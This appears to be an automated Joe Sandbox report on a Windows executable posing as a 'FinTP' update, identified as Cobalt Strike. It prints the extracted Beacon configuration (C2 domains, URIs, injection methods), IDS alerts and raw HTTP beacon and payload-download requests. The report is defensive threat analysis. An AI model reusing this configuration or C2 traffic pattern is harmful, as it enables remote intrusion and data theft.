Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
FinTP-Update.exe

Overview

General Information

Sample name:FinTP-Update.exe
Analysis ID:1578576
MD5:4038d28c25e96e0e4045b3bc1093f497
SHA1:0e2dcc88362b508e3b317b890809fc7a7b37915d
SHA256:87ae2867d3cd63d4dcefe95d7ada9cba63d77ac8d1b739177f0c7870ce0472b3
Tags:exeuser-smica83
Infos:

Detection

CobaltStrike
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected CobaltStrike
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found direct / indirect Syscall (likely to bypass EDR)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Detected potential crypto function
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • FinTP-Update.exe (PID: 1276 cmdline: "C:\Users\user\Desktop\FinTP-Update.exe" MD5: 4038D28C25E96E0E4045B3BC1093F497)
    • conhost.exe (PID: 1996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Cobalt Strike, CobaltStrikeCobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit.The Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.
  • APT 29
  • APT32
  • APT41
  • AQUATIC PANDA
  • Anunak
  • Cobalt
  • Codoso
  • CopyKittens
  • DarkHydrus
  • Earth Baxia
  • FIN6
  • FIN7
  • Leviathan
  • Mustang Panda
  • Shell Crew
  • Stone Panda
  • TianWu
  • UNC1878
  • UNC2452
  • Winnti Umbrella
https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike

Malware Configuration

Threatname: CobaltStrike

{"BeaconType": ["HTTPS"], "Port": 443, "SleepTime": 15000, "MaxGetSize": 2801745, "Jitter": 37, "C2Server": "www.finttp.ro,/rss/portallogin-gettask.html,www.flntp.ro,/rss/portallogin-gettask.html", "HttpPostUri": "/rss/portallogin-sendlogin.html", "Malleable_C2_Instructions": ["Remove 1522 bytes from the end", "Remove 84 bytes from the beginning", "Remove 3931 bytes from the beginning", "Base64 URL-safe decode", "XOR mask w/ random key"], "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\gpupdate.exe", "Spawnto_x64": "%windir%\\sysnative\\gpupdate.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 309948737, "bStageCleanup": "True", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "False", "bProcInject_UseRWX": "False", "bProcInject_MinAllocSize": 17500, "ProcInject_PrependAppend_x86": ["kJA=", "Empty"], "ProcInject_PrependAppend_x64": ["kJA=", "Empty"], "ProcInject_Execute": ["ntdll:RtlUserThreadStart", "CreateThread", "NtQueueApcThread-s", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "NtMapViewOfSection", "bUsesCookies": "True", "HostHeader": ""}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapWindows_Trojan_CobaltStrike_f0b627fcRule for beacon reflective loaderunknown
  • 0x1e16f:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 41 8B 84 24 98 00 00 00 25 FF FF FF 00 3D 42 42 42 00 75
  • 0x1f46a:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 41 8B 84 24 98 00 00 00 25 FF FF FF 00 3D 42 42 42 00 75

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000003.2425134169.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CobaltStrike_2Yara detected CobaltStrikeJoe Security
    00000000.00000003.2425134169.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CobaltStrike_4Yara detected CobaltStrikeJoe Security
      00000000.00000003.2425134169.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CobaltStrike_3Yara detected CobaltStrikeJoe Security
        00000000.00000003.2425134169.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_CobaltStrike_f0b627fcRule for beacon reflective loaderunknown
        • 0x1f28e:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 41 8B 84 24 98 00 00 00 25 FF FF FF 00 3D 42 42 42 00 75
        • 0x2041f:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 41 8B 84 24 98 00 00 00 25 FF FF FF 00 3D 42 42 42 00 75
        00000000.00000003.2313200724.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CobaltStrike_2Yara detected CobaltStrikeJoe Security
          Click to see the 226 entries

          Sigma Signatures

          No Sigma rule has matched

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-12-19T23:12:14.340202+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.549705TCP
          2024-12-19T23:12:17.271253+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.549706TCP
          2024-12-19T23:12:19.484501+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.549707TCP
          2024-12-19T23:12:21.689438+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.549708TCP
          2024-12-19T23:12:23.938801+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.549710TCP
          2024-12-19T23:12:26.146640+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.549717TCP
          2024-12-19T23:12:28.623297+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.549725TCP
          2024-12-19T23:12:30.852350+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.549731TCP
          2024-12-19T23:12:33.070480+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.549738TCP
          2024-12-19T23:12:35.362742+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.549744TCP
          2024-12-19T23:12:37.619541+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.549750TCP
          2024-12-19T23:12:39.835436+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.549756TCP
          2024-12-19T23:12:42.073130+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.549762TCP
          2024-12-19T23:12:44.255883+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.549768TCP
          2024-12-19T23:12:46.455049+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.549773TCP
          2024-12-19T23:12:48.678819+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.549780TCP
          2024-12-19T23:12:50.867126+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.549786TCP
          2024-12-19T23:12:53.332796+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.549792TCP
          2024-12-19T23:12:55.536771+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.549798TCP
          2024-12-19T23:12:57.727238+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.549804TCP
          2024-12-19T23:12:59.923490+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.549810TCP
          2024-12-19T23:13:02.414598+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.549816TCP
          2024-12-19T23:13:04.713196+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.549822TCP
          2024-12-19T23:13:07.154589+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.549829TCP
          2024-12-19T23:13:09.360049+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.549835TCP
          2024-12-19T23:13:11.606752+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.549843TCP
          2024-12-19T23:13:13.817857+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.549850TCP
          2024-12-19T23:13:16.063530+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.549856TCP
          2024-12-19T23:13:18.263363+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.549862TCP
          2024-12-19T23:13:20.465077+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.549868TCP
          2024-12-19T23:13:22.680981+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.549874TCP
          2024-12-19T23:13:24.872501+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.549880TCP
          2024-12-19T23:13:27.078589+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.549886TCP
          2024-12-19T23:13:29.294801+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.549892TCP
          2024-12-19T23:13:31.653829+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.549898TCP
          2024-12-19T23:13:33.854578+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.549905TCP
          2024-12-19T23:13:36.041029+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.549911TCP
          2024-12-19T23:13:38.282346+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.549917TCP
          2024-12-19T23:13:40.479064+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.549923TCP
          2024-12-19T23:13:42.717053+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.549929TCP
          2024-12-19T23:13:44.941571+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.549935TCP
          2024-12-19T23:13:47.126874+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.549941TCP
          2024-12-19T23:13:49.326528+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.549947TCP
          2024-12-19T23:13:51.544160+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.549953TCP
          2024-12-19T23:13:53.759357+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.549959TCP
          2024-12-19T23:13:56.110383+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.549965TCP
          2024-12-19T23:13:58.344816+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.549971TCP
          2024-12-19T23:14:00.557948+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.549977TCP
          2024-12-19T23:14:02.791434+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.549983TCP
          2024-12-19T23:14:05.015988+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.549989TCP
          2024-12-19T23:14:07.229524+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.549995TCP
          2024-12-19T23:14:09.453436+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.550001TCP
          2024-12-19T23:14:11.708964+010020330091Malware Command and Control Activity Detected3.79.209.76443192.168.2.550007TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-12-19T23:12:10.800926+010028033053Unknown Traffic192.168.2.5497043.79.209.7680TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus / Scanner detection for submitted sample
          Source: FinTP-Update.exeAvira: detected
          Found malware configuration
          Source: 00000000.00000003.2313200724.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: CobaltStrike {"BeaconType": ["HTTPS"], "Port": 443, "SleepTime": 15000, "MaxGetSize": 2801745, "Jitter": 37, "C2Server": "www.finttp.ro,/rss/portallogin-gettask.html,www.flntp.ro,/rss/portallogin-gettask.html", "HttpPostUri": "/rss/portallogin-sendlogin.html", "Malleable_C2_Instructions": ["Remove 1522 bytes from the end", "Remove 84 bytes from the beginning", "Remove 3931 bytes from the beginning", "Base64 URL-safe decode", "XOR mask w/ random key"], "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\gpupdate.exe", "Spawnto_x64": "%windir%\\sysnative\\gpupdate.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 309948737, "bStageCleanup": "True", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "False", "bProcInject_UseRWX": "False", "bProcInject_MinAllocSize": 17500, "ProcInject_PrependAppend_x86": ["kJA=", "Empty"], "ProcInject_PrependAppend_x64": ["kJA=", "Empty"], "ProcInject_Execute": ["ntdll:RtlUserThreadStart", "CreateThread", "NtQueueApcThread-s", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "NtMapViewOfSection", "bUsesCookies": "True", "HostHeader": ""}
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Source: unknownHTTPS traffic detected: 3.79.209.76:443 -> 192.168.2.5:49705 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 3.79.209.76:443 -> 192.168.2.5:49706 version: TLS 1.2
          Source: FinTP-Update.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: Binary string: C:\Users\dan\source\repos\ConsoleApplication6\x64\Release\ConsoleApplication6.pdb$$ source: FinTP-Update.exe
          Source: Binary string: C:\Users\dan\source\repos\ConsoleApplication6\x64\Release\ConsoleApplication6.pdb source: FinTP-Update.exe

          Networking

          barindex
          Suricata IDS alerts for network traffic
          Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49707
          Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49717
          Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49705
          Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49708
          Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49706
          Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49710
          Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49731
          Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49744
          Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49738
          Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49762
          Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49750
          Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49768
          Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49786
          Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49773
          Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49792
          Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49810
          Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49804
          Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49780
          Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49756
          Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49822
          Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49843
          Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49816
          Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49798
          Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49829
          Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49874
          Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49850
          Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49835
          Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49892
          Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49898
          Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49856
          Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49868
          Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49880
          Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49917
          Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49862
          Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49929
          Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49911
          Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49923
          Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49953
          Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49905
          Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49935
          Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49995
          Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49965
          Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:50007
          Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49983
          Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49959
          Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49947
          Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49725
          Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49886
          Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49989
          Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49941
          Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49977
          Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:50001
          Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49971
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.finttp.ro
          Source: global trafficHTTP traffic detected: GET /fintp.x64.bin HTTP/1.0Host: www.flntp.ro
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49704 -> 3.79.209.76:80
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
